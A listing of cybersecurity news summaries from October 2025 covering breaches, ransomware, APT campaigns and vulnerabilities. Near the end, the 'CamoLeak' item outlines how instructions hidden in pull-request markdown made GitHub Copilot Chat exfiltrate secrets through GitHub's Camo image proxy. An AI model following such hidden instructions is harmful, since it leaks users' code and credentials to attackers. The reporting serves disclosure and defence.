F5 Breached by Nation-State Actor; BIG-IP Source Code Stolen, CISA Issues Emergency Directive

Application security vendor F5 has disclosed a major security breach attributed to a 'highly sophisticated nation-state threat actor.' The attackers maintained long-term access to F5's internal development environments, exfiltrating portions of the BIG-IP source code, information on undisclosed vulnerabilities, and some customer configuration data. While F5 states there is no evidence of software supply chain modification, the incident poses a significant future risk. In response, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Emergency Directive 26-01, mandating all federal civilian agencies to immediately patch F5 products, inventory devices, and remove end-of-life systems from their networks.

Oct 19, 20255 min read

Massive Airline Data Breach Hits 13 Million Vietnam Airlines and Qantas Customers

A major data breach originating from a third-party service provider has compromised the personal information of approximately 13 million customers of Vietnam Airlines and Qantas. A group calling itself 'Scattered LAPSUS$ Hunters' claims to have stolen the data in June by breaching the Salesforce accounts of a technology partner used by the airlines. The leaked data includes full names, dates of birth, email addresses, phone numbers, and loyalty program details. Both airlines have confirmed the breach and are urging customers to change their passwords.

Oct 19, 20255 min read

"SIMCARTEL" CaaS Network Busted in Major European Takedown

A coordinated international law enforcement operation codenamed "SIMCARTEL" has dismantled a massive Cybercrime-as-a-Service (CaaS) platform operating out of Latvia. The operation, involving authorities from Austria, Estonia, and Finland with support from Europol, resulted in seven arrests and the seizure of a vast infrastructure that enabled millions of euros in financial fraud. The network provided criminals with access to over 40,000 active SIM cards via SIM box devices, which were used to create approximately 49 million fraudulent online accounts, facilitating crimes like phishing, smishing, and investment fraud across Europe.

Oct 19, 20255 min read

Silver Fox APT Expands Reach, Targets Japan and Malaysia with New RAT

The Chinese-nexus cybercrime group known as "Silver Fox" has expanded its targeting beyond China and Taiwan to include organizations in Japan and Malaysia. Researchers report the group is using phishing emails with malicious PDFs to distribute the HoldingHands RAT. This expansion follows previous campaigns where the group used diverse tactics, including SEO poisoning to spread the Winos 4.0 (ValleyRAT) malware and Bring Your Own Vulnerable Driver (BYOVD) attacks to disable security software. The group's evolving tactics and widening geographic scope indicate an increased threat to government and commercial entities across Asia.

Oct 19, 20255 min read

Panera Bread Reaches $2.5M Settlement for 2024 Data Breach

Panera Bread has agreed to a $2.5 million settlement to resolve a class-action lawsuit related to a data breach that occurred in March 2024. The breach exposed the personal information, including names and Social Security numbers, of approximately 147,321 individuals, primarily current and former employees. Under the settlement, affected individuals can file claims for reimbursement of expenses and time spent dealing with the breach's aftermath, with a claim deadline of November 11, 2025.

Oct 19, 20254 min read

Volkswagen Probes 8Base Ransomware Attack Claim

The Volkswagen Group is investigating a claim from the 8Base ransomware group that it has breached the automotive giant and stolen sensitive data. 8Base, a data extortion group linked to Phobos ransomware, posted a trove of allegedly stolen files on its dark web site, including accounting documents and employee contracts. Volkswagen stated its core IT systems are secure but acknowledged the possibility of a breach through a third-party supplier, highlighting the growing threat of supply chain attacks. The incident places Volkswagen under potential GDPR scrutiny.

Oct 19, 20255 min read

'Mysterious Elephant' APT Evolves, Deploys Custom Tools in Espionage Campaign

The cyber-espionage group known as 'Mysterious Elephant' has demonstrated a significant evolution in its capabilities, moving away from recycled malware to deploying its own custom-developed tools. Since early 2025, the APT group has been targeting government and diplomatic entities in South Asia. This strategic shift indicates an increased level of sophistication and investment, allowing the group to create more effective and evasive malware for its intelligence-gathering operations. The campaign poses a notable threat to the targeted governments and may have indirect implications for European nations with interests in the region.

Oct 18, 20255 min read

Microsoft Patches 172 Flaws, Including Three Actively Exploited Zero-Days

Microsoft's October 2025 Patch Tuesday update is one of the largest of the year, addressing over 172 vulnerabilities across its product suite. The release is critically important as it includes patches for three zero-day vulnerabilities under active attack. These include an elevation of privilege flaw in the Windows Remote Access Connection Manager (CVE-2025-59230), which has been added to CISA's KEV catalog. Additionally, a highly critical, pre-authentication remote code execution vulnerability (CVE-2025-59287) in the Windows Server Update Service (WSUS) with a 9.8 CVSS score requires immediate attention. The update also marks the final security patch for most versions of Windows 10, pushing organizations towards migration.

Oct 18, 20255 min read

Cisco Zero-Day Flaw Actively Exploited to Implant Linux Rootkits on Network Switches

A critical zero-day vulnerability in Cisco IOS and IOS XE software, tracked as CVE-2025-20352, has been actively exploited in the wild to install Linux rootkits on network devices. The campaign, dubbed 'ZeroDisco' by Trend Micro, targeted Cisco 9400, 9300, and 3750G series switches. The attackers leveraged the SNMP stack overflow flaw for remote code execution after obtaining high-privilege credentials, implanting a fileless rootkit that could evade detection by disappearing after a reboot. Cisco has released patches and urges customers to update affected devices immediately.

Oct 18, 20255 min read

Deloitte to Pay $6.3M in Settlement for Rhode Island Data Breach Affecting 640,000

Deloitte has agreed to a proposed $6.3 million class-action settlement related to a 2024 cyberattack that compromised the personal data of 640,000 Rhode Island residents—nearly half the state's population. The breach affected the state's 'RIBridges' social services system, which was managed by Deloitte. The incident resulted in significant disruption to state government services and the eventual leak of some compromised data on the dark web. This settlement is in addition to a previous $5 million payment Deloitte made to the state to cover breach-related expenses.

Oct 18, 20254 min read

New 'CAPI Backdoor' Malware Targets Russian Auto and E-Commerce Firms

A new cyberespionage campaign is targeting the Russian automobile and e-commerce sectors using a previously undocumented .NET malware known as 'CAPI Backdoor'. According to researchers at Seqrite Labs, the attack is initiated through phishing emails containing a ZIP archive with a malicious LNK file. The malware uses a living-off-the-land technique, executing via 'rundll32.exe', and establishes persistence through scheduled tasks and startup folder entries. CAPI Backdoor is designed to gather system information, check for antivirus products, and exfiltrate data to a C2 server.

Oct 18, 20254 min read

Everest Ransomware Claims Collins Aerospace Hack; Leak Site Mysteriously Goes Offline

The Everest ransomware group has claimed responsibility for the September 2025 cyberattack on Collins Aerospace, a major aviation and defense contractor. The attack caused widespread disruption, affecting check-in and boarding systems at major European airports like Heathrow and Brussels. Shortly after posting the claim on its dark web data leak site, the site became inaccessible, displaying a "Fatal error" message. This has fueled speculation about a potential law enforcement takedown or internal disruption within the ransomware group.

Oct 18, 20254 min read

Massive Supply Chain Risk Found in VSCode Marketplace; 100+ Extensions Leaked Access Tokens

Researchers at Wiz have discovered a significant supply chain risk in the popular VSCode and OpenVSX extension marketplaces. They found that publishers of over 100 extensions had inadvertently leaked their access tokens, which could have allowed attackers to hijack the extensions and distribute malware to more than 150,000 users. The research also uncovered over 550 exposed secrets within 500+ extensions, providing access to developer accounts on services like AWS, GitHub, and OpenAI, further highlighting the pervasive security risks in the software development ecosystem.

Oct 18, 20254 min read

UK's NCSC Warns of 'Alarming' Rise in Cyberattacks, Doubling in Past Year

The UK's National Cyber Security Centre (NCSC) revealed in its 2025 annual review that it managed 204 "nationally significant" cyberattacks over the past year, more than double the 89 incidents from the previous year. The agency attributed the alarming surge to increasing threats from state-sponsored actors, particularly Russia and China, as well as the proliferation of sophisticated ransomware gangs. The NCSC has urged UK businesses to treat cybersecurity as a matter of survival and to elevate cyber resilience to a board-level responsibility to combat the growing threat.

Oct 18, 20254 min read

Ransomware Attacks Surge 36% in Q3 2025, Data Stolen in 96% of Cases

A new report from cybersecurity firm BlackFog reveals that publicly disclosed ransomware attacks surged by 36% year-over-year in the third quarter of 2025, setting a new record. The analysis highlights the near-universal adoption of double-extortion tactics, with data exfiltration occurring in 96% of all incidents. The Qilin ransomware group was identified as the most active publicly attributed gang. Healthcare remained the most targeted public sector, while manufacturing was the hardest-hit sector in non-disclosed attacks, underscoring the pervasive and growing threat of ransomware across all industries.

Oct 18, 20254 min read

CISA Warns: Critical Adobe AEM Flaw (CVSS 10.0) Actively Exploited

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning for a critical remote code execution (RCE) vulnerability in Adobe Experience Manager (AEM) Forms, tracked as CVE-2025-54253. The flaw, which carries a perfect 10.0 CVSS score, allows for unauthenticated arbitrary code execution and is being actively exploited in the wild. CISA has added it to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by November 5, 2025. The vulnerability stems from a misconfiguration in JEE versions of AEM that exposes a debug servlet, allowing attackers to achieve full system compromise.

Oct 17, 20254 min read

UK Fines Capita £14M for "Preventable" 2023 Data Breach

The UK's Information Commissioner's Office (ICO) has levied a £14 million fine against outsourcing giant Capita for significant data protection failures related to a March 2023 data breach that impacted 6.6 million people. The ICO's investigation concluded the breach was 'preventable' and heavily criticized Capita's slow incident response, noting that a compromised device remained active on the network for 58 hours after detection, allowing for further exploitation. The penalty highlights the increasing regulatory focus on the speed and efficacy of breach containment.

Oct 17, 20254 min read

CISA Issues 13 Advisories for Critical ICS/OT Vulnerabilities

On October 16, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a significant batch of thirteen advisories for vulnerabilities affecting Industrial Control Systems (ICS). These alerts impact widely used Operational Technology (OT) products from major vendors including Rockwell Automation, Siemens, Hitachi Energy, Schneider Electric, and Delta Electronics. The flaws pose a direct risk to critical infrastructure sectors such as manufacturing and energy. CISA is urging all asset owners and operators to review the advisories and implement the recommended mitigations immediately.

Oct 17, 20254 min read

California Enacts Stricter Data Breach Law with 30-Day Notification Deadline

California has enacted Senate Bill 446, a new law that significantly shortens the data breach notification timeline for businesses. Organizations must now inform affected California residents of a data breach involving unencrypted personal information within 30 calendar days of its discovery. This amendment to the state's already stringent privacy laws places increased pressure on companies to have highly efficient incident detection and response processes in place to meet the accelerated deadline.

Oct 17, 20254 min read

Ransomware Attacks Surge by 46% as Threat Actors Target Construction and Manufacturing

Despite a slight decrease in overall weekly cyber attacks, ransomware activity has surged by 46%, according to a new report from Check Point Research. This indicates a strategic shift by threat actors towards more focused and impactful ransomware campaigns. The construction, business services, and industrial manufacturing sectors have been the most victimized, bearing the brunt of this new wave. The report identifies the Qilin ransomware-as-a-service (RaaS) group as one of the most prominent actors, responsible for 14.1% of publicly disclosed victims. The findings highlight an urgent need for organizations, especially in the industrial and business services sectors, to bolster their defenses against an increasingly targeted ransomware threat.

Oct 17, 20254 min read

Akira Ransomware Gang Actively Exploiting SonicWall VPNs for Network Breaches

The Akira ransomware group is actively exploiting vulnerabilities in SonicWall SSL VPN devices to gain initial access to corporate networks. By targeting these widely used, internet-facing appliances, the threat actors can establish a foothold, move laterally, exfiltrate sensitive data, and ultimately deploy the Akira ransomware payload. This campaign underscores the critical importance of promptly patching edge devices and enforcing multi-factor authentication for all remote access solutions to defend against sophisticated ransomware attacks.

Oct 16, 20256 min read

CISA Orders Urgent Patching After Chinese Hackers Steal F5 Source Code

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Emergency Directive 26-01, ordering federal agencies to take immediate action after F5 disclosed a severe breach by a sophisticated nation-state actor, reportedly linked to China. The attackers maintained access for at least a year, exfiltrating proprietary source code for F5 BIG-IP products and details of unpatched vulnerabilities. This breach poses an imminent supply chain risk, as the stolen data could allow adversaries to craft powerful zero-day exploits against F5 customers worldwide, including government and critical infrastructure.

Oct 16, 20256 min read

Microsoft Thwarts Ransomware Campaign by Revoking 200+ Malicious Code-Signing Certificates

Microsoft has taken decisive action to disrupt a ransomware campaign by the threat group Vanilla Tempest (also known as Vice Society), which has been targeting education and healthcare. The group was using over 200 fraudulently obtained code-signing certificates to sign counterfeit Microsoft Teams installers. These fake installers delivered the Oyster backdoor, which in turn deployed the Rhysida ransomware. By revoking the certificates from providers like DigiCert, SSL.com, and its own Trusted Signing service, Microsoft has significantly hindered the malware's ability to evade detection.

Oct 16, 20255 min read

Full Industrial Control: Two CVSS 10.0 Flaws Found in Red Lion ICS RTUs

Security researchers have discovered and disclosed two critical vulnerabilities, both rated CVSS 10.0, in Red Lion Sixnet series industrial remote terminal units (RTUs). The flaws, CVE-2023-42770 (authentication bypass) and CVE-2023-40151 (remote code execution), can be chained together. An unauthenticated attacker can exploit them over the network to execute arbitrary commands with root privileges on affected devices, which are commonly used in critical infrastructure sectors like energy and water treatment, posing a risk of severe physical disruption.

Oct 16, 20255 min read

New 'LinkPro' Linux Rootkit Uses eBPF and 'Magic Packets' for Ultimate Stealth

Security researchers have uncovered a sophisticated new GNU/Linux rootkit named 'LinkPro' after investigating a compromised AWS environment. The malware demonstrates advanced stealth capabilities by leveraging extended Berkeley Packet Filter (eBPF) modules to hide its processes and files from security tools. Furthermore, it employs a novel activation mechanism, lying dormant until it receives a specially crafted 'magic packet' over the network. The initial intrusion vector was a vulnerable Jenkins server, from which the attackers deployed the rootkit via a malicious Docker image.

Oct 16, 20256 min read

Qilin Ransomware Group Adds New Victims to Leak Site

The Qilin ransomware-as-a-service (RaaS) operation continues its campaign of double extortion, recently adding new victims to its data leak site. Among the latest targets are U.S.-based electrical equipment manufacturer Beta Dyne and Middlesex Appraisal Associates. According to research from Resecurity, the group's operational resilience is bolstered by its use of a global network of bulletproof hosting providers, making its infrastructure difficult to disrupt. The group's continued activity poses a persistent threat to organizations across various sectors, leveraging data encryption and the threat of public data release to pressure victims into paying ransoms.

Oct 16, 20254 min read

Vietnam Airlines Breach: 7.3M Customer Records Exposed in Salesforce Supply Chain Attack

Vietnam Airlines has suffered a massive data breach exposing the records of 7.3 million unique customers. The attack, revealed on October 11, 2025, is attributed to the 'Scattered LAPSUS$ Hunters' hacking group, the same collective behind the recent Qantas breach. The compromise occurred in June 2025 when attackers gained access to the airline's Salesforce-based CRM platform. The stolen data, which includes 7.3 million unique email addresses and other personal details, was released in October. The incident highlights the growing threat of supply chain attacks targeting major software vendors like Salesforce to compromise their extensive client bases. The airline's delayed response has drawn criticism for a lack of transparency.

Oct 15, 20255 min read

Canadian Tire Reveals E-Commerce Data Breach Affecting Multiple Retail Brands

Canadian Tire Corp., a major Canadian retail conglomerate, has reported a data breach affecting its e-commerce customers. Discovered on October 2, 2025, the incident involved unauthorized access to a single database serving multiple brands, including Canadian Tire, SportChek, Mark's/L'Équipeur, and Party City. The exposed data includes customer names, addresses, email addresses, and years of birth. The company stated that financial data and its Triangle Rewards loyalty program were not impacted. For a subset of fewer than 150,000 customers whose full birth dates were exposed, Canadian Tire is offering complimentary credit monitoring services.

Oct 15, 20254 min read

LockBit Ransomware Returns from Hiatus with Upgraded 'Version 5.0'

After a two-month hiatus following law enforcement disruption, the prolific LockBit ransomware group has returned, announcing the release of LockBit 5.0. This new version of the ransomware-as-a-service (RaaS) malware incorporates significant technical upgrades designed to evade detection and analysis. According to researchers, a key new feature is the ability to patch Event Tracing for Windows (ETW), a technique that blinds security monitoring tools by altering in-memory logging. The upgraded malware is designed for cross-platform attacks, targeting Windows, Linux, and VMware ESXi environments, signaling LockBit's intent to reclaim its dominant position in the cybercrime ecosystem.

Oct 15, 20255 min read

Israeli Defense R&D Firm 'MAYA' Targeted in Pro-Resistance Hacktivist Attack

A hacktivist group calling itself the 'Cyber Support Front' has claimed responsibility for a cyberattack against MAYA, an Israeli research and development firm with close ties to the country's Ministry of Defense and major defense contractors like Elbit Systems and Rafael. In a public statement on October 14, the group alleged it had disrupted MAYA's systems and exfiltrated sensitive data, including designs for current and future military equipment. The claims have not been officially confirmed by Israeli authorities, but the incident highlights the ongoing threat of politically motivated cyberattacks against the defense industrial base.

Oct 15, 20254 min read

Fortinet Discloses High-Severity Authenticated RCE Flaw in FortiOS CLI

Fortinet has disclosed a high-severity vulnerability in the command line interface (CLI) of its FortiOS operating system. The flaw could allow an authenticated attacker to execute arbitrary commands on the underlying system. While a CVE identifier has not yet been assigned and specific affected versions are not detailed, the vulnerability poses a significant risk. An attacker with valid CLI credentials could leverage this flaw to gain full control of a Fortinet appliance, bypass security controls, and use the device as a pivot point for further network intrusion. Administrators are urged to monitor for an official security advisory and apply patches as soon as they are available.

Oct 15, 20254 min read

Chinese APT 'Jewelbug' Breaches Russian IT Firm in Supply Chain Threat

In a rare instance of Chinese cyber-espionage targeting a Russian entity, the APT group known as Jewelbug compromised a Russian IT service provider for five months in early 2025. According to Symantec, the attackers gained access to the firm's code repositories and software build systems, creating a significant risk of a software supply chain attack. The group used the powerful ShadowPad backdoor and exfiltrated data to Yandex Cloud to evade detection. This campaign highlights the expanding target scope of Chinese APTs and their focus on compromising trusted providers to enable downstream attacks.

Oct 14, 20255 min read

Fashion Retailer MANGO Discloses Data Breach from Third-Party Vendor

Global fashion retailer MANGO has notified customers of a data breach that originated from a compromise at an external marketing service provider. The incident, disclosed on October 14, 2025, resulted in the unauthorized access of customer contact information, including names, country, postal codes, email addresses, and phone numbers. MANGO has confirmed that its internal systems were not affected and that no sensitive financial data or account credentials were exposed. The company has reported the breach to the Spanish Data Protection Agency (AEPD) and is advising customers to be wary of potential phishing attacks.

Oct 14, 20254 min read

Adobe Patches 35+ Flaws, Including Critical RCE Bug in Connect

As part of its October 2025 security updates, Adobe has released patches for more than 35 vulnerabilities across a dozen products. The most severe of these is a critical cross-site scripting (XSS) vulnerability in Adobe Connect, tracked as CVE-2025-49553, which could lead to arbitrary code execution. The flaw holds a CVSS score of 9.3. Other high-severity flaws were addressed in Adobe Commerce and Magento Open Source. Adobe has assigned a lower priority rating to most updates but recommends that users of Commerce and Magento patch promptly due to a historically elevated risk of attack.

Oct 14, 20254 min read

Massive Botnet of 100k+ IPs Targets U.S. RDP Services

Security researchers at GreyNoise have identified a massive, coordinated botnet campaign targeting Remote Desktop Protocol (RDP) services across the United States. The operation, which began on October 8, 2025, involves over 100,000 unique IP addresses from more than 100 countries. The botnet is using enumeration and timing attacks against RD Web Access and RDP web clients to identify valid user credentials. The widespread and centrally controlled nature of the campaign poses a significant threat to any organization exposing RDP to the internet, as a successful compromise can quickly lead to ransomware deployment or data theft.

Oct 14, 20255 min read

Qilin Ransomware Hits Japanese Beer Giant Asahi, Steals 27GB of Data

The Russia-based Qilin ransomware group has claimed responsibility for a cyberattack that disrupted operations at Asahi Group Holdings, Japan's largest brewing company. The attack, confirmed by Asahi on October 6, impacted order and shipment systems. On its dark web leak site, the Qilin gang stated it exfiltrated 27 gigabytes of sensitive corporate data, including contracts, financial documents, and employee information. The group has posted samples of the stolen data to pressure Asahi into paying the ransom, highlighting the severe risk ransomware poses to manufacturing and supply chain operations.

Oct 14, 20254 min read

Living Off the Land: Hackers Abuse Velociraptor DFIR Tool to Deploy Ransomware

A suspected China-based threat group, Storm-2603, is weaponizing the legitimate open-source digital forensics and incident response (DFIR) tool, Velociraptor. According to Cisco Talos, the attackers are using an outdated and vulnerable version of the tool (exploiting CVE-2025-6264) to gain persistence, escalate privileges, and deploy multiple ransomware families, including Warlock, LockBit, and Babuk. The campaign highlights the growing trend of attackers abusing trusted security tools to evade detection while compromising VMware ESXi and Windows environments.

Oct 13, 20255 min read

Supply Chain Attack Hits Discord: Vendor Breach Exposes 70,000 User IDs

The communication platform Discord has disclosed a significant data breach originating from a third-party customer service vendor, 5CA. The incident, which occurred in early October 2025, resulted in unauthorized access to the sensitive data of approximately 70,000 users who had interacted with Discord's support teams. Exposed information includes photos of government-issued IDs, names, email addresses, IP addresses, and partial billing data. The breach highlights the persistent and growing risk of supply chain attacks, where attackers target less secure partners to access data from larger organizations.

Oct 13, 20254 min read

Ransomware Groups Pivot to Healthcare Vendors, Attacks Surge 30%

A new report from Comparitech reveals a significant strategic shift in ransomware attacks targeting the healthcare sector. While attacks on direct care providers remained steady, incidents involving healthcare-affiliated businesses and vendors surged by 30% in the first nine months of 2025. Threat actors like Qilin and INC are increasingly targeting less-secure partners such as medical billing services and pharmaceutical manufacturers to disrupt the healthcare supply chain, leading to the breach of over 6 million records from confirmed attacks on these adjacent businesses alone.

Oct 13, 20254 min read

Russian APT Seashell Blizzard Targets European Critical Infrastructure

A subgroup of the Russian state-sponsored threat actor Sandworm, tracked as Seashell Blizzard, is conducting a new campaign against critical infrastructure in Ukraine and Europe. The attacks leverage phishing emails with malicious XLL attachments to deliver a custom downloader, CheapShot, which in turn deploys a backdoor called ShroudDoor. The campaign targets organizations in the agricultural, defense, transportation, and manufacturing sectors, highlighting ongoing espionage and disruptive efforts by Russian APTs.

Oct 13, 20254 min read

LastPass Warns of Active Phishing Campaign Impersonating Brand

Password manager LastPass issued an alert on October 13, 2025, about an active phishing campaign targeting its users. The attackers are sending emails from a fraudulent domain with subject lines like "We Have Been Hacked," creating a false sense of urgency to trick users into clicking a malicious link. The link directs victims to a convincing phishing site designed to steal their master password. LastPass has confirmed it was not hacked and is working to take down the malicious infrastructure.

Oct 13, 20254 min read

New Android Spyware "ClayRat" Spreads via Telegram, Hijacks SMS

A new Android spyware named "ClayRat" is targeting Russian users through fake applications distributed on phishing sites and Telegram. The malware uses sophisticated techniques to bypass Android 13+ security restrictions, install itself as the default SMS handler to intercept 2FA codes, and exfiltrate a wide range of data including call logs and photos. A key feature of ClayRat is its self-propagation mechanism, where it automatically sends malicious links via SMS to all contacts on the victim's device, rapidly expanding the infection.

Oct 13, 20254 min read

Ivanti Discloses 13 Vulnerabilities in Endpoint Manager, Two High-Severity

Ivanti has released a security advisory for its Endpoint Manager (EPM) software, detailing 13 new vulnerabilities. The batch includes two high-severity flaws—one allowing for local privilege escalation and another for remote code execution with user interaction—and eleven medium-severity bugs, many of which are SQL injection vulnerabilities. While none of the flaws are known to be actively exploited, Ivanti is urging customers to upgrade from the now end-of-life EPM 2022 to the more secure 2024 version and apply forthcoming patches.

Oct 13, 20254 min read

New York Inflation Refund Program Exploited in Phishing Scams

The New York State Department of Taxation and Finance is warning residents about phishing and smishing (SMS phishing) campaigns that are exploiting a legitimate state inflation relief program. Scammers are sending fraudulent messages claiming that recipients must submit personal and payment information via a malicious link to receive their refund. In reality, the legitimate program sends checks automatically to eligible taxpayers with no action required. The scams use social engineering to create urgency and trick victims into giving up sensitive data.

Oct 13, 20253 min read

Cl0p Exploits Oracle EBS Zero-Day in Widespread Extortion Campaign, FBI Issues Emergency Warning

A financially motivated threat group, claiming ties to the notorious **[Cl0p](https://attack.mitre.org/groups/G0114/)** ransomware gang, has been exploiting a critical zero-day vulnerability in **[Oracle E-Business Suite](https://www.oracle.com/applications/ebs/)** (EBS). The flaw, **CVE-2025-61882**, is an unauthenticated remote code execution vulnerability with a 9.8 CVSS score. Investigations by Google and Mandiant reveal the attackers exploited the flaw since at least August 2025, months before Oracle released a patch on October 4. The campaign involves exfiltrating large volumes of data and sending extortion emails to executives. The **[FBI](https://www.fbi.gov)** has issued an emergency directive urging immediate patching, highlighting the severe risk to sectors like healthcare and education, with Harvard University confirmed as one of the victims.

Oct 13, 20256 min read

Oracle Issues Emergency Patch for High-Severity EBS Flaw Amid Active Clop Attacks

Oracle has released an emergency security patch for a high-severity vulnerability, CVE-2025-61884, in its E-Business Suite (EBS). The flaw, which has a CVSS score of 7.5, allows an unauthenticated, remote attacker to access sensitive data within the Oracle Configurator module. It affects EBS versions 12.2.3 through 12.2.14. This alert is especially critical as it comes while the Clop ransomware group is actively exploiting a separate, critical zero-day (CVE-2025-61882) in EBS for an executive extortion campaign. While there's no confirmed link, the active targeting of EBS by Clop significantly increases the risk that this new vulnerability will be weaponized. Administrators are urged to apply the patch immediately.

Oct 12, 20254 min read

Discord Denies Massive Breach Claim After Hackers Allege 1.5TB Data Leak

Discord is publicly denying claims that it suffered a major data breach. On October 11, 2025, an unknown group of hackers alleged they had exfiltrated and leaked 1.5 terabytes of user data, including highly sensitive government-issued identification documents. Some reports suggested the breach was linked to Discord's Zendesk customer support portal, an allegation Zendesk also refuted, stating its systems were not vulnerable. Discord maintains that its services were not compromised and that the claims are unverified. The significant discrepancy between the hackers' claims and the company's denial leaves the situation unclear, but the mere allegation of leaked IDs poses a serious concern for users.

Oct 12, 20255 min read

North Korean Hackers Shatter Records, Stealing $2 Billion in Crypto in 2025

North Korean state-sponsored hacking groups have stolen over $2 billion in cryptocurrency assets in 2025 so far, marking the largest annual total ever recorded for the regime. A report highlighted on October 11, 2025, points to the increasing scale and sophistication of these financially motivated cyber operations. The single largest heist of the year was the February 2025 attack on the Bybit cryptocurrency exchange, which accounted for $1.46 billion of the total losses. These attacks on crypto exchanges and DeFi platforms are a critical source of revenue for North Korea, allowing it to circumvent international sanctions and fund its weapons programs.

Oct 12, 20255 min read

North Korean IT Worker Fraud Scheme Expands, Targeting 5,000 Companies

A sophisticated North Korean scheme using fraudulent IT worker personas to infiltrate companies has expanded into a massive global operation. According to a report from October 11, 2025, researchers have identified over 130 fake identities used in more than 6,500 job interviews with approximately 5,000 companies over a four-year period. These state-sponsored operatives pose as skilled freelance IT workers to secure remote employment, then use their insider access to conduct espionage, steal intellectual property, and divert funds. The campaign, previously thought to be focused on the U.S., is now confirmed to be global, prompting warnings for businesses to enhance their hiring and verification processes for remote workers.

Oct 12, 20255 min read

Critical RCE Flaw in WooCommerce Designer Pro Plugin Puts WordPress Sites at Risk

A critical vulnerability, CVE-2025-6439, has been disclosed in the WooCommerce Designer Pro WordPress plugin. The flaw, rated 9.8 out of 10 on the CVSS scale, is a path traversal issue that allows an unauthenticated attacker to delete arbitrary files on the web server. This could lead to complete data loss, website destruction, or even remote code execution (RCE) by deleting critical files like wp-config.php and re-running the WordPress installation. The vulnerability affects all versions up to and including 1.9.26 and is also present in the 'Pricom' theme which bundles the plugin. Users are urged to update immediately.

Oct 12, 20254 min read

WordPress Plugin 'Contest Gallery' Vulnerable to CSV Injection Attacks

A medium-severity CSV injection vulnerability, CVE-2025-11254, has been disclosed in the 'Contest Gallery' plugin for WordPress. The flaw affects all versions up to and including 27.0.3. It allows an unauthenticated attacker to embed malicious formulas into data fields that are later exported as a CSV file by a site administrator. If the administrator opens the malicious CSV file in a spreadsheet program like Microsoft Excel, the formulas can execute, potentially leading to arbitrary code execution on their local machine. The vulnerability has a CVSS score of 4.3 and has been patched in version 28.0.0 of the plugin.

Oct 12, 20254 min read

Discord Breach Exposes 5.5M Users via Third-Party Vendor Compromise

Discord has officially confirmed a data breach that originated from a compromised third-party customer support vendor, Zendesk. The incident exposed the data of users who had interacted with Discord's support channels. Hackers claim to have exfiltrated information from 5.5 million users, including usernames, email addresses, IP addresses, and the contents of support tickets. Discord has assured its community that sensitive data such as passwords and authentication tokens were not compromised. In response, Discord has revoked the vendor's system access and is in the process of notifying all affected individuals, highlighting the persistent risks associated with third-party supply chain security.

Oct 11, 20255 min read

175 Malicious NPM Packages Target Developers in Widespread Phishing Attack

A significant software supply chain attack has been identified on the npm open-source repository, where researchers discovered 175 malicious packages that were downloaded approximately 26,000 times. These packages were trojanized to execute credential phishing attacks against developers, aiming to steal logins and API keys. The campaign, which primarily targeted the technology and energy sectors, often used typosquatting techniques to mimic legitimate packages. This incident highlights the critical need for organizations to implement stringent dependency vetting and runtime security monitoring to defend against attacks targeting the software development lifecycle.

Oct 11, 20255 min read

New 'Chaosbot' Malware Weaponizes Cisco VPN & AD Credentials for Lateral Movement

A new malware strain named "Chaosbot" has been discovered by security researchers. It specializes in using stolen Cisco VPN and Active Directory credentials to execute commands and move laterally within compromised corporate networks. By leveraging legitimate enterprise tools and protocols, this 'living off the land' technique makes the malware's activity difficult to distinguish from normal administrative behavior. Chaosbot represents a significant threat for establishing persistence, escalating privileges, and deploying secondary payloads like ransomware.

Oct 11, 20255 min read

New 'Stealit' Malware Targets Developers via Malicious Node.js Extensions

A new information-stealing malware named "Stealit" is targeting Windows systems by using malicious Node.js extensions as its infection vector. This novel approach specifically targets software developers, aiming to steal sensitive data such as source code, API keys, and other credentials directly from their development environments. The emergence of Stealit highlights an increasing focus by threat actors on compromising the software supply chain at its source, turning trusted development tools into attack vectors.

Oct 11, 20255 min read

'MalTerminal' Malware Uses OpenAI's GPT-4 to Auto-Generate Ransomware Code

Researchers have discovered "MalTerminal," a novel malware that uses OpenAI's GPT-4 large language model (LLM) to dynamically generate ransomware code. This represents a significant and dangerous evolution in malware development, enabling the creation of polymorphic code that can evade traditional signature-based detection. The technique dramatically lowers the barrier for less-skilled actors to create sophisticated attacks and poses a major new challenge for cybersecurity defenses, requiring a shift towards behavioral analysis and anomaly detection.

Oct 11, 20256 min read

Juniper Networks Patches 220 Flaws, Including Nine Critical Bugs Dating Back Years

Juniper Networks has released a massive security update for October 2025, addressing a total of 220 vulnerabilities across its broad portfolio of networking products. The patch bundle includes fixes for nine flaws rated as critical, posing a severe risk of remote code execution or system takeover. Alarmingly, analysis suggests some of these vulnerabilities have existed in products since at least 2019, creating a long window of exposure for potential exploitation. Customers are urged to review the advisories and apply the necessary updates with extreme urgency.

Oct 11, 20255 min read

Cl0p Ransomware Exploits Oracle E-Business Suite Zero-Day in Mass Attack

The notorious Cl0p ransomware gang is conducting a widespread extortion campaign by exploiting a critical, unauthenticated remote code execution (RCE) zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite. The campaign, active since at least August, involves Cl0p breaching vulnerable systems to steal data and then sending extortion emails to thousands of accounts. Oracle has released an emergency patch for the flaw, which affects versions 12.2.3 through 12.2.14, and is urging customers to update immediately. This attack follows Cl0p's established pattern of leveraging high-impact zero-days in enterprise software for mass compromise.

Oct 10, 20255 min read

GitHub Patches 'CamoLeak' Flaw in Copilot That Allowed Silent Code and Secret Exfiltration

A critical vulnerability, dubbed 'CamoLeak,' has been discovered and patched in **[GitHub Copilot Chat](https://github.com/features/copilot)**. The flaw, rated 9.6 CVSS by researcher Omer Mayraz of Legit Security, allowed attackers to silently steal private source code, API keys, and other secrets from developers' repositories. The attack involved a novel prompt injection technique where malicious instructions were hidden in a pull request's markdown. When a developer used Copilot to review the PR, the AI would execute the hidden commands. The stolen data was then exfiltrated character-by-character using a clever trick involving **[GitHub](https://github.com/)**'s own image proxy service, Camo, bypassing standard security controls. GitHub has mitigated the flaw by disabling image rendering in Copilot Chat.

Oct 10, 20255 min read

Crypto Platform Shuffle.com Discloses Major Data Breach via Third-Party CRM Provider

